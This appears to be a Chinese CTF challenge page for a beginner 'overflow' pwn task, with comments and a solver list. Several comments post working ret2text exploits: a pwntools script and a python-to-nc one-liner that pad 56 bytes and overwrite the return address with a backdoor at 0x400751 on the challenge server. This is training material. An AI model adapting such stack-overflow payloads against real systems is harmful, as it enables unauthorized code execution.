overflowPWN 未解决

分数: 20 金币: 4
题目作者: harry
一  血: blanc
一血奖励: 1金币
解  决: 1957
提  示:
描  述:
pwn2
其  他: 下载
评论
xtk 20天前

from pwn import * io=remote("171.80.2.169",17626) payload=b'a'*(0x30+8)+p64(0x400751) io.recvline("say something?\n") io.sendline(payload) io.interactive()栈溢出覆盖返回地址到后门函数就好了

回复 0

modeng 2月前

这是我的思路,希望能帮到你解题 https://blog.csdn.net/m_de_g/article/details/155747760?spm=1001.2014.3001.5502

回复 0

王安小子 2月前

python3 -c 'print("A"*56 + "\x51\x07\x40\x00\x00\x00\x00\x00")' | nc 171.80.2.169 15170 就ok

回复 0

乌鸦乌鸦乌鸦乌鸦 6月前

为什么答案是56字节,我测出来是40字节

回复 0
scust 6月前

看到main中char s[48]; // [rsp+0h] [rbp-30h] BYREF没?padding = 0x30+8 #epb占用8个字节

回复 1

weiyouzhunze 8月前

栈溢出漏洞利用

回复 0

afag 10月前

0x30+8填充

回复 0

17773146280 10月前

简单的ret2text题目,后门函数地址加上缓冲区长度就可以了

回复 0

YellowZy 1年前

应该是从stack of main里面看到s到r的距离还有8字节的偏移,所以应该是48+8=56字节填充

回复 0

255a 1年前

修改main函数返回地址的rcx的值

回复 0

da111sy 1年前

https://zaoganmaqule.github.io/2024/08/21/bugku-ctf%E7%9A%84pwn%E9%A2%98%E8%A7%A3/#more

回复 4
puppet 1年前

能看见这么多题解真好

回复 0

WriteUp

image
Leuslu

9 金币

评分(1)

解题动态

fusheng012 攻破了该题 1天前
宇文璇月 攻破了该题 3天前
eason2023 攻破了该题 4天前
meowshark 攻破了该题 10天前
阳间 攻破了该题 11天前
nuandong9099 攻破了该题 12天前
yihan 攻破了该题 12天前
huangshi 攻破了该题 12天前
假面骑士佟以冬 攻破了该题 14天前
xM 攻破了该题 15天前
vvvy 攻破了该题 17天前
xtk 攻破了该题 20天前
不为 攻破了该题 20天前
等往事风中吹‘ 攻破了该题 20天前
kkkkkkkkkkk 攻破了该题 21天前
谢勇强大王 攻破了该题 23天前
pwn00 攻破了该题 24天前
whhphd 攻破了该题 24天前
错了南北 攻破了该题 25天前
ctfdshen 攻破了该题 26天前
问题反馈